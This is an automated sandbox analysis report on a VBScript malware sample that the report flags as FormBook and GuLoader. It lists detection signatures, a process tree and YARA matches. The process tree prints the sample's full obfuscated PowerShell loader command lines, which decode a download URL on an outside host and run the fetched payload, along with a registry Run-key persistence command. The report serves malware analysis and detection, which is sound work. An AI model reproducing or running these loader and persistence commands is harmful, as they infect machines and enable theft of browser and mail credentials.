
Windows Analysis Report
01105751.vbs

Overview

General Information

Sample name: 01105751.vbs (renamed because original name is a hash value)
Original sample name: _20240501105751.vbs
Analysis ID: 1435413
MD5: 5c7e4886e009c7d2908ec633bf48cf8e
SHA1: 72e9f5c65571b19402febfa7f36fc6ee5ce9a0f3
SHA256: c950aba2061fbb90b63122bec04b71764966e5554b6cd40114772c392464f748
Tags: vbs

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Creates multiple autostart registry keys
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5176 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 4340 cmdline: ping google.com -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 3776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PING.EXE (PID: 6704 cmdline: ping %.%.%.% MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3224 cmdline: C:\Windows\system32\cmd.exe /c dir MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. 
Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed $.inguK lirevYderzrEutopnExaucehep.a)Kinkl ');Gracy216 (Programregningsfunktionens ' G ni$Hot ogBoffilBotchoOcto bD gsoapetull Akse:ReillJAlkalaPointd Nigre Wien=Alv o$micr RSkribeLute,p DestrMnsteoConfegSemisrKul,uaShephmVokstm Du,teFdevassten.. 
E.ilsIconopCarpelMediaiCalvat Sol ( ylds$DemenKFur arPrecieWhoretFladliBlownd Enkesifr,eeErnrif Re.af Cooke Anenk RaadtOu.fle Aft.rInclunO erfeFor,lsTimal)Morsk ');$Reprogrammes=$Jade[0];Gracy216 (Programregningsfunktionens 'P ovo$ orong.lyngl d.bkoModelbG uetaRe.islSmaad:DarviOSe vbpoverbb .delaParask raman preti ModsnDelirgSk teeIsomorSpildnPanoce Hec,sBogst= MakvNM.rphe Therw.unda- LakfO ndebG,verjAcquae Aca cFakket Paah B,vidSTransyGaards U.vitGigole Bes.m Til,.BarreNill meHrevitpl ni. ,ddiW Fyrie S,ilb KodeCDecerl,krmiiKenyoeElseknReinttKaryo ');Gracy216 (Programregningsfunktionens ' Opkr$ anicO Am tpmanifbAeriaaDragokSom knlag,piCowbon TestgBve reDialerTapetn Occ.e Acc,sLysim.BegruHSensaeSola,aeddo.dMidene,esbirSkrivszuric[Unbat$DyrskSPrivipAgglorBrdskaBondeySkrlleChromnJabotsDysc,]Afse.=Clino$PerisD CeptiSpants NummkCarpooAstros,harnkThoseaCzardsYement ,reteTauterVirileFotognSlang ');$unrestitutive=Programregningsfunktionens 'unquiO.etshpKardub enfoaUns.rkKh.lin.undaiSdeign Af.kgStikkeforfarPhilinSchooeMastes fjer.CubanDI dusoA,sluw MissnBonifltal,uo Spira Irrad ndriF .yrsi my,glSta.leCon.i(Immun$SkadeRSi.use SulppUnhilrExcuso .uargQuislrGaaseaSmid m FollmBeefiebod gs ,one,Unchl$sk ifBSamitaSmaabgHaveeaGotergimpeteWolfyrDebat) Dext ';$unrestitutive=$Virksomhedstypens[1]+$unrestitutive;$Bagager=$Virksomhedstypens[0];Gracy216 (Programregningsfunktionens 'Bruge$KabelgCrackl BankoAntikbSystea kovsl ehf:Wit iC i,dhhFunktaCo.dyrMatripNonreiChapt= Hasl(DobbeTGenv.eAntidsVognpt u pa-Fyr.ePChiboadiplotFogethPense svog$FeltrBGranoaUndergS alta EjurgLact ePiar rBlaas) Bonb ');while (!$Charpi) {Gracy216 (Programregningsfunktionens '.ekor$attragLitholPerinoOverab S riaMaelsl Eass:Xe opkTrapplOve.ci HousgPlatyeFiffischl.r=buest$,oldft ersirKonsuuDyr,eeHoved ') ;Gracy216 $unrestitutive;Gracy216 (Programregningsfunktionens 'DrakoSCustutAli,aaAmo.nrS.ltitDoser-B.criSSocialhear e JosteKalciplynce Minds4 tra, ');Gracy216 (Programregningsfunktionens 
'Moiti$HentrgHomeslAttrioTylerbTocylaDesp.l Ri s:Hoo aC epash,rdnua NicorHemsepDeerfi,esbe=Pseud(,crieTFiordeBebl s Rub t F.va-SnaffPsq,ataS,aahtWizenhProgr Udste$XylidBTilstaKommugTypegaEp togLykkee ypoar Bevg)Niels ') ;Gracy216 (Programregningsfunktionens 'Amidu$ I dlgFlgesl Bilfo Barrb Afa a Ca,slapote:Vi erTIma.erHeadseAfskynEuxans Imp.eKobsjs nfer=T wmo$ NitrgG raflNewyooAtwixbIrredaCarpelPresb:TipskC,ynkeiEndesr FurlcHandeuSu,erm FlegzBlikkeGl,conMotiviBogs.t PoethCleara TriulLo,di+be.ka+Gymno%Trans$.crumJShawyaklostdUdlaae Quin.NonhecUn roo Ink,uNo phn com,t ewr ') ;$Reprogrammes=$Jade[$Trenses];}Gracy216 (Programregningsfunktionens 'Riban$IncongCheepl ar.eo Sperbglucoas,lenlRubin:Snvr.F GererFil,ue Salld Semis Showb Kalce S,bdv Holda SubseMaleagFl veeUnivelFactisYahgaeJ.wle1Negli3Incul3Besti m,dm= Fitm FecktG pfyleBepaitOctof- Fr mCgaranochartnKrad tPrioreU.ympnBestetRe.ns Hj or$ N geBRegnsaBromcg.ermsaPasipgSou.we ntrrMes e ');Gracy216 (Programregningsfunktionens 'Hjert$watergAabnelPro.iounre,b VoksaAutomlCoisl: RyddIAl,ctn MarkcSeptioRemonaHebdolB eeke AinusVeksecVictieHerm nTeachc ExteeFine Nicht=Jus,l Avoca[ ,issSKenosy Haw sKakoftN.nhee Und,m asr. AltaCFejlboMidfinSide,vToldbeA oebrBeboetEumen]Dngbr:Taarn:RecepFSava.rSkingoBillim RemuBSiliqa fremsSparee obsc6Under4N theSSee,st ,ndsrTyp.oiHjmesn AfkagSk iv(,prrs$N ettFKolonrRetoueglottdRecalsUnt.mb Dadaekeratv Sovea False ungbgSor.aeSpaaklM.sdesCetaneTunne1defig3cep.a3Bredd)sloww ');Gracy216 (Programregningsfunktionens 'Ances$CellugTnkeelCaesioArvesb MetraRumswl igan: romaPunproe ,ekulGl,sasPiruedT.rreyLejlarCeremf GelaaT.rifrHugonmIndag Preki=vendi D.ase[NeddyScoffeySmudgsMu,kitGemineb belmDyppe. 
HresT S,ipeChowdxapolltMlkes.KontrE ,rdin O,occ Ind oRest,dLoomiiBortfnKedelgIncul]Natur:Hoved:StracAPrjudS.archC pantI PhenI N.nf.GelatGUdskre ,ildt Arm.SCommetInvadr Messi,ooksnDj,elgudham(Uroks$RunouIMedicnSau ecNonproUdvisaFrih lFortreKalots Volcc KlkkesticknParenc Vmi e,osta)Therm ');Gracy216 (Programregningsfunktionens 'Reac $ FadegMaximlEkskloHorosb ,onnaSyst,lReces: SmreSMcmahiTragtlHeadsdAnkeseBa.etfBytt,i Serts orfrkExtboeMisadrnulpunHjtidedatol=R str$XiphiPS,atieNonprlEstersSa,frd akneyKatarr mesef UnstastyrerreblomBesla.huff.sCubituVictib,indes nlegtOr anrKnippiShallnTink.g s.ld( Navn3Nonsy1Pride9 Pref8Hotel5Dialo3 ,ilb,Neis 2 Brev8Un,ro4Flaad1Svens7,reex)Terro ');Gracy216 $Sildefiskerne;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1436 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6096 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. 
Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed $.inguK lirevYderzrEutopnExaucehep.a)Kinkl ');Gracy216 (Programregningsfunktionens ' G ni$Hot ogBoffilBotchoOcto bD gsoapetull Akse:ReillJAlkalaPointd Nigre Wien=Alv o$micr RSkribeLute,p DestrMnsteoConfegSemisrKul,uaShephmVokstm Du,teFdevassten.. 
E.ilsIconopCarpelMediaiCalvat Sol ( ylds$DemenKFur arPrecieWhoretFladliBlownd Enkesifr,eeErnrif Re.af Cooke Anenk RaadtOu.fle Aft.rInclunO erfeFor,lsTimal)Morsk ');$Reprogrammes=$Jade[0];Gracy216 (Programregningsfunktionens 'P ovo$ orong.lyngl d.bkoModelbG uetaRe.islSmaad:DarviOSe vbpoverbb .delaParask raman preti ModsnDelirgSk teeIsomorSpildnPanoce Hec,sBogst= MakvNM.rphe Therw.unda- LakfO ndebG,verjAcquae Aca cFakket Paah B,vidSTransyGaards U.vitGigole Bes.m Til,.BarreNill meHrevitpl ni. ,ddiW Fyrie S,ilb KodeCDecerl,krmiiKenyoeElseknReinttKaryo ');Gracy216 (Programregningsfunktionens ' Opkr$ anicO Am tpmanifbAeriaaDragokSom knlag,piCowbon TestgBve reDialerTapetn Occ.e Acc,sLysim.BegruHSensaeSola,aeddo.dMidene,esbirSkrivszuric[Unbat$DyrskSPrivipAgglorBrdskaBondeySkrlleChromnJabotsDysc,]Afse.=Clino$PerisD CeptiSpants NummkCarpooAstros,harnkThoseaCzardsYement ,reteTauterVirileFotognSlang ');$unrestitutive=Programregningsfunktionens 'unquiO.etshpKardub enfoaUns.rkKh.lin.undaiSdeign Af.kgStikkeforfarPhilinSchooeMastes fjer.CubanDI dusoA,sluw MissnBonifltal,uo Spira Irrad ndriF .yrsi my,glSta.leCon.i(Immun$SkadeRSi.use SulppUnhilrExcuso .uargQuislrGaaseaSmid m FollmBeefiebod gs ,one,Unchl$sk ifBSamitaSmaabgHaveeaGotergimpeteWolfyrDebat) Dext ';$unrestitutive=$Virksomhedstypens[1]+$unrestitutive;$Bagager=$Virksomhedstypens[0];Gracy216 (Programregningsfunktionens 'Bruge$KabelgCrackl BankoAntikbSystea kovsl ehf:Wit iC i,dhhFunktaCo.dyrMatripNonreiChapt= Hasl(DobbeTGenv.eAntidsVognpt u pa-Fyr.ePChiboadiplotFogethPense svog$FeltrBGranoaUndergS alta EjurgLact ePiar rBlaas) Bonb ');while (!$Charpi) {Gracy216 (Programregningsfunktionens '.ekor$attragLitholPerinoOverab S riaMaelsl Eass:Xe opkTrapplOve.ci HousgPlatyeFiffischl.r=buest$,oldft ersirKonsuuDyr,eeHoved ') ;Gracy216 $unrestitutive;Gracy216 (Programregningsfunktionens 'DrakoSCustutAli,aaAmo.nrS.ltitDoser-B.criSSocialhear e JosteKalciplynce Minds4 tra, ');Gracy216 (Programregningsfunktionens 
'Moiti$HentrgHomeslAttrioTylerbTocylaDesp.l Ri s:Hoo aC epash,rdnua NicorHemsepDeerfi,esbe=Pseud(,crieTFiordeBebl s Rub t F.va-SnaffPsq,ataS,aahtWizenhProgr Udste$XylidBTilstaKommugTypegaEp togLykkee ypoar Bevg)Niels ') ;Gracy216 (Programregningsfunktionens 'Amidu$ I dlgFlgesl Bilfo Barrb Afa a Ca,slapote:Vi erTIma.erHeadseAfskynEuxans Imp.eKobsjs nfer=T wmo$ NitrgG raflNewyooAtwixbIrredaCarpelPresb:TipskC,ynkeiEndesr FurlcHandeuSu,erm FlegzBlikkeGl,conMotiviBogs.t PoethCleara TriulLo,di+be.ka+Gymno%Trans$.crumJShawyaklostdUdlaae Quin.NonhecUn roo Ink,uNo phn com,t ewr ') ;$Reprogrammes=$Jade[$Trenses];}Gracy216 (Programregningsfunktionens 'Riban$IncongCheepl ar.eo Sperbglucoas,lenlRubin:Snvr.F GererFil,ue Salld Semis Showb Kalce S,bdv Holda SubseMaleagFl veeUnivelFactisYahgaeJ.wle1Negli3Incul3Besti m,dm= Fitm FecktG pfyleBepaitOctof- Fr mCgaranochartnKrad tPrioreU.ympnBestetRe.ns Hj or$ N geBRegnsaBromcg.ermsaPasipgSou.we ntrrMes e ');Gracy216 (Programregningsfunktionens 'Hjert$watergAabnelPro.iounre,b VoksaAutomlCoisl: RyddIAl,ctn MarkcSeptioRemonaHebdolB eeke AinusVeksecVictieHerm nTeachc ExteeFine Nicht=Jus,l Avoca[ ,issSKenosy Haw sKakoftN.nhee Und,m asr. AltaCFejlboMidfinSide,vToldbeA oebrBeboetEumen]Dngbr:Taarn:RecepFSava.rSkingoBillim RemuBSiliqa fremsSparee obsc6Under4N theSSee,st ,ndsrTyp.oiHjmesn AfkagSk iv(,prrs$N ettFKolonrRetoueglottdRecalsUnt.mb Dadaekeratv Sovea False ungbgSor.aeSpaaklM.sdesCetaneTunne1defig3cep.a3Bredd)sloww ');Gracy216 (Programregningsfunktionens 'Ances$CellugTnkeelCaesioArvesb MetraRumswl igan: romaPunproe ,ekulGl,sasPiruedT.rreyLejlarCeremf GelaaT.rifrHugonmIndag Preki=vendi D.ase[NeddyScoffeySmudgsMu,kitGemineb belmDyppe. 
HresT S,ipeChowdxapolltMlkes.KontrE ,rdin O,occ Ind oRest,dLoomiiBortfnKedelgIncul]Natur:Hoved:StracAPrjudS.archC pantI PhenI N.nf.GelatGUdskre ,ildt Arm.SCommetInvadr Messi,ooksnDj,elgudham(Uroks$RunouIMedicnSau ecNonproUdvisaFrih lFortreKalots Volcc KlkkesticknParenc Vmi e,osta)Therm ');Gracy216 (Programregningsfunktionens 'Reac $ FadegMaximlEkskloHorosb ,onnaSyst,lReces: SmreSMcmahiTragtlHeadsdAnkeseBa.etfBytt,i Serts orfrkExtboeMisadrnulpunHjtidedatol=R str$XiphiPS,atieNonprlEstersSa,frd akneyKatarr mesef UnstastyrerreblomBesla.huff.sCubituVictib,indes nlegtOr anrKnippiShallnTink.g s.ld( Navn3Nonsy1Pride9 Pref8Hotel5Dialo3 ,ilb,Neis 2 Brev8Un,ro4Flaad1Svens7,reex)Terro ');Gracy216 $Sildefiskerne;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2308 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 5512 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 3360 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 5616 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • TsrCaEwNrfOKANGWcsg.exe (PID: 4092 cmdline: "C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • xcopy.exe (PID: 6664 cmdline: "C:\Windows\SysWOW64\xcopy.exe" MD5: 7E9B7CE496D09F70C072930940F9F02C)
              • TsrCaEwNrfOKANGWcsg.exe (PID: 7132 cmdline: "C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 4776 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wab.exe (PID: 6484 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 2136 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 4852 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
No configs have been found
Source / Rule / Description / Author / Strings
Source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp; Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp; Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown
  • 0x4752a:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x30aa9:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp; Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown
  • 0x2a4d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13a4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 0000000B.00000002.2879301889.0000000008910000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_5; Description: Yara detected GuLoader; Author: Joe Security
Source / Rule / Description / Author / Strings
Source: amsi64_5692.amsi.csv; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
        • 0x1024e:$b2: ::FromBase64String(
        • 0xd5e0:$s1: -join
        • 0x6d8c:$s4: +=
        • 0x6e4e:$s4: +=
        • 0xb075:$s4: +=
        • 0xd192:$s4: +=
        • 0xd47c:$s4: +=
        • 0xd5c2:$s4: +=
        • 0xf819:$s4: +=
        • 0xf899:$s4: +=
        • 0xf95f:$s4: +=
        • 0xf9df:$s4: +=
        • 0xfbb5:$s4: +=
        • 0xfc39:$s4: +=
        • 0xdd02:$e4: Get-WmiObject
        • 0xdef1:$e4: Get-Process
        • 0xdf49:$e4: Start-Process
Source: amsi32_6096.amsi.csv; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
        • 0x101bd:$b2: ::FromBase64String(
        • 0xd5e0:$s1: -join
        • 0x6d8c:$s4: +=
        • 0x6e4e:$s4: +=
        • 0xb075:$s4: +=
        • 0xd192:$s4: +=
        • 0xd47c:$s4: +=
        • 0xd5c2:$s4: +=
        • 0xf819:$s4: +=
        • 0xf899:$s4: +=
        • 0xf95f:$s4: +=
        • 0xf9df:$s4: +=
        • 0xfbb5:$s4: +=
        • 0xfc39:$s4: +=
        • 0xdd02:$e4: Get-WmiObject
        • 0xdef1:$e4: Get-Process
        • 0xdf49:$e4: Start-Process
        • 0x17ac0:$e4: Get-Process

        System Summary

